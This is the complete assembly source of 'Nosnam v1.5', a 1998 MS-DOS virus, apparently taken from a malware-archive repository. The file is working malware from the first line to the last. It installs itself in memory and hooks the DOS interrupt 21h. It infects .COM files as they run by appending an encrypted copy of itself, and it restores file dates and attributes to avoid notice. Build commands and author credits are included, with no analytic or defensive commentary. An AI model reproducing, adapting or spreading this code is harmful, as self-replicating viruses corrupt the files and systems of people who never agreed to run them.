MalwareSourceCode/MSDOS/N-Index/Virus.MSDOS.Unknown.nosnam.asm

265 lines
14 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; ------------------------------------------------------------------------- ;
; Nosnam v1.5 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: `-------------------| Started: 07/06/98 | Finished: 09/06/98 ;
; `-------------------^------------------- ;
; v1.0 - TSR *.com appender, direct MCB manipulation style | Size: 430 ;
; v1.1 - add some XOR,NEG,NOT,ROR encryption to this `---------- ;
; v1.2 - Infects only files < 1,000 bytes and > 62,000 bytes ;
; v1.3 - saves and restores the time / date stamps ;
; v1.4 - infects files with any attributes ;
; v1.5 - saves and restores file attributes ;
; ------------------------------------------------------------------------- ;
; ------> For Christine Moore, For The Codebreakers & For Mind Warp <----- ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm nosnam.asm ;
; to link :::::] tlink /t nosnam.obj ;
; ------------------------------------------------------------------------- ;
code segment ; name our segment 'code'
assume cs:code,ds:code ; assign cs and ds to code
org 100h ; this be a .com file
.286 ; needed for pusha/popa
blank: db 0e9h,0,0 ; define blank jump
start: call delta ; push IP on to stack
delta: pop bp ; pop it into BP
sub bp,offset delta ; get delta offset
encryp: jmp first ; jump to first (overwritten)
lea si,[bp+encd] ; load SI with encrypted area start
mov di,si ; move that address into DI
call encr ; call the encryption loop
jmp encd ; jump to encrypted area start
encr: lodsb ; load a byte from AL
not al ; encryptin 1
ror al,4 ; encryptin 2
neg al ; encryptin 3
xor al,byte ptr [bp+key] ; unencrypt 4
neg al ; unencrypt 3
ror al,4 ; unencrypt 2
not al ; unencrypt 1
stosb ; store the byte
loop encr ; do all the bytes
ret ; return from call
key db 0 ; define our key here
encd: mov ax,0deadh ; move 0deadh into AX
int 21h ; if resident, 0deadh is in BX
cmp bx,0deadh ; check to see if it is
jne go_rez ; nope, go rezident now
jmp first3 ; jump to first three
go_rez: sub word ptr cs:[2],80h ; lower top of memory data in PSP
mov ax,cs ; move CS into AX
dec ax ; decrement AX
mov ds,ax ; move new value into DS
sub word ptr ds:[3],80h ; sub 2kb from accessed MCB
xor ax,ax ; AX to 0 now
mov ds,ax ; DS is now 0
sub word ptr ds:[413h],2 ; adjust BIOS data area by 2kb
mov ax,word ptr ds:[413h] ; move adjusted BIOS mem to AX
mov cl,6 ; load CL with 6
shl ax,cl ; multiply BIOS base mem by 64
mov es,ax ; move the value to ES
push cs ; push CS again so you can
pop ds ; restore DS to original value
xor di,di ; DI is now 0
lea si,[bp+start] ; SI loaded with start address
mov cx,finished-start ; # of bytes to write
rep movsb ; load virus into memory
hook: xor ax,ax ; ax to 0
mov ds,ax ; DS to 0
lea ax,isr ; point IVT to new ISR
sub ax,offset start ; subtract start offset
mov bx,es ; move extra segment into BX
cli ; clear interrupts
xchg ax,word ptr ds:[21h*4] ; getting Int 21
xchg bx,word ptr ds:[21h*4+2] ; into bx and ax
mov word ptr es:[oi21-offset start],ax ; save old int 21
mov word ptr es:[oi21+2-offset start],bx ; save old int 21
sti ; restore interrupts
push cs ; push code segment register
push cs ; push it again
pop ds ; put it into DS
pop es ; put it into ES
first3: lea si,[bp+buffer] ; restore first three bytes
mov di,100h ; 100h to restore them too
push di ; push 100h on to stack
movsb ; move one byte
movsw ; move one word
retn ; return control to host
isr: pushf ; push all the flags
cmp ax,0deadh ; have we added check value?
jne exec ; yup, wait now for 4bh
mov bx,0deadh ; nope adding it now
popf ; pop all flags
iret ; pop cs:ip+flags from stack
exec: pusha ; push all registers
push ds ; push DS
push es ; likewize for ES
cmp ah,4bh ; something being executed?
je main ; yup, on with the infecting
jmp exit2 ; naw, jump to original ISR
goexit: jmp exit ; need this to make the jump
main: push bp ; save original delta offset
call tsrdel ; push IP on to stack
tsrdel: pop bp ; pop it off into BP
sub bp,offset tsrdel ; get 2nd delta offset
push ds ; push DS again
pop es ; and pop it into ES
mov di,dx ; move file info into DI
mov cx,64 ; 64 byte filename possible
mov al,'.' ; load al with .
cld ; clear direction flag
repnz scasb ; scan until . is hit
cmp word ptr ds:[di],'OC' ; check for .CO-
jne goexit ; not a .com file, exit
cmp word ptr ds:[di+2],'M' ; check for .--M
jne goexit ; not a .com file, exit
mov ax,4300h ; get file attributes
int 21h ; we have the attributes
push cx ; save attribute #1
push dx ; save attribute #2
push ds ; save attribute #3
mov ax,4301h ; set file attributes
xor cx,cx ; to none at all
int 21h ; file is ready now
mov ax,3d02h ; open the file now
int 21h ; open it up now
xchg bx,ax ; move the info
push cs ; push code segment register
push cs ; push it again
pop ds ; put it into DS
pop es ; put it into ES
mov ax,5700h ; get the time / date stamps
int 21h ; got them now
push dx ; save value #1
push cx ; save value #2
mov ah,3fh ; the record function
lea dx,[bp+buffer] ; record bytes here
mov cx,3 ; record three bytes
int 21h ; restore them now
mov ax,4202h ; scan to end of file
cwd ; dx to 0
xor cx,cx ; cx to 0
int 21h ; DX:AX = file size now!
cmp dx,0 ; is the file < 65,535 bytes?
jne close ; way to big, close it up
mov cx,word ptr [bp+buffer+1] ; move buffer+1 into CX
add cx,finished-start+3 ; virus size + jump
cmp ax,cx ; compare file size and CX
jz close ; if equal, close it up
cmp ax,1000 ; compare 1000 bytes with CX
jb close ; file too small, close it
cmp ax,62000 ; compare 62,000 bytes with AX
ja close ; file too big, close it up
sub ax,3 ; subtract 3 from filesize
mov word ptr [bp+newjump+1],ax ; write as our new jump
mov ax,4200h ; point to start of file
cwd ; dx to 0
xor cx,cx ; cx to 0
int 21h ; now pointing to start
mov ah,40h ; write to file
mov cx,3 ; three bytes
lea dx,[bp+newjump] ; write this
int 21h ; jump is written
mov ax,4202h ; scan to end of file
cwd ; dx to 0
xor cx,cx ; cx to 0
int 21h ; now pointing to end
in al,40h ; get random value
mov byte ptr [bp+key],al ; save as our key
mov ah,40h ; write to file
lea dx,[bp+start] ; where to start
mov cx,encd-start ; # of bytes to write
int 21h ; write those bytes
lea di,[bp+finished] ; DI points to encrypted area end
push di ; save value, we need it in a minute
lea si,[bp+encd] ; SI points to encrypted area start
mov cx,finished-encd ; # of bytes to encrypt
push cx ; save value, we need it in a minute
call encr ; encrypt those bytes now
mov ah,40h ; write to file
pop cx ; use that saved value from before
pop dx ; use the other saved value
int 21h ; write those bytes
close: mov ax,5701h ; set time / date stamps
pop cx ; from saved value #2
pop dx ; from saved value #1
int 21h ; time / date is restored
mov ax,4301h ; set file attributes
pop ds ; from saved value #3
pop dx ; from saved value #2
pop cx ; from saved value #1
int 21h ; attributes restored
mov ah,3eh ; close the file
int 21h ; file is closed
exit: pop bp ; pop the original delta offset
exit2: pop es ; pop ES from stack
pop ds ; pop DS from stack
popa ; pop all registers
popf ; pop all flags
db 0eah ; jump to original ISR
; ---------------------------( The Data Area )----------------------------- ;
; ------------------------------------------------------------------------- ;
oi21 dd ? ; old int 21 goes here
buffer db 0cdh,20h,0 ; terminates 1st gen
virname db 'Nosnam',0 ; the virus name
newjump db 0e9h,0,0 ; blank jump 1st gen
finished label near ; the offset label
; ---------------------( Not Saved / Not Encrypted )----------------------- ;
; ------------------------------------------------------------------------- ;
first: lea di,[bp+encryp] ; load with start address
lea si,[bp+new] ; load with bytes to move
movsw ; move two bytes
movsb ; move one byte
jmp encd ; jump to encrypted area
new: mov cx,finished-encd ; this will overwrite the jump
; ------------------------------( The End )-------------------------------- ;
; ------------------------------------------------------------------------- ;
code ends ; end code segment
end blank ; end it all / where to start
; ------------------------------------------------------------------------- ;
; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
; ------------------------------------------------------------------------- ;